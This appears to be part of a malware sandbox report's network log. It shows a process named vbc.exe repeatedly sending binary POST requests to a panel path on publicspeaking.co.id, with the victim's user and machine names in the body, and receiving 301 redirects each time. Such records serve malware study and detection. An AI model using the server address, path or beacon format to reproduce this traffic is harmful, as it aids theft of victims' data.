                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:39.530806065 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.54977492.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:39.794246912 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:39.913796902 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:40.227108955 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:41.400176048 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:41 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 5fc098bcd47fe42863ae8ad60c913341-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.337
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:41.400341988 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.54977992.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:41.673158884 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:41.792851925 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:43.380470037 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:43 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 191b7efda0d8a997dfcc5d1d446f8ab5-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.360
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:43.380490065 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.54978592.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:43.656884909 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:43.778744936 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:45.336585045 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:45 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: c064e0f172080024cb52589f419b32bd-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.335
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:45.336741924 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.54979192.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:45.605190039 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:45.725101948 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:47.298543930 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:47 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 82499c41d3fa166dffc4d9ebff14935c-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.337
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:47.298624039 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.54979792.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:47.582710028 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:47.702296972 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:49.264209986 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:49 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 0291f1313fb506091b13befba1c2dbc0-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.337
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:49.264269114 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.54980392.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:49.534415007 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:49.654094934 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:51.145335913 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:50 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 8d7760ad1a740759e3f805e9d2c6e061-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.333
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:51.145369053 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.54980892.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:51.661875010 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:51.781466961 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:53.385320902 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:53 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: eb8d5737261849c6c29770327ba18794-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.355
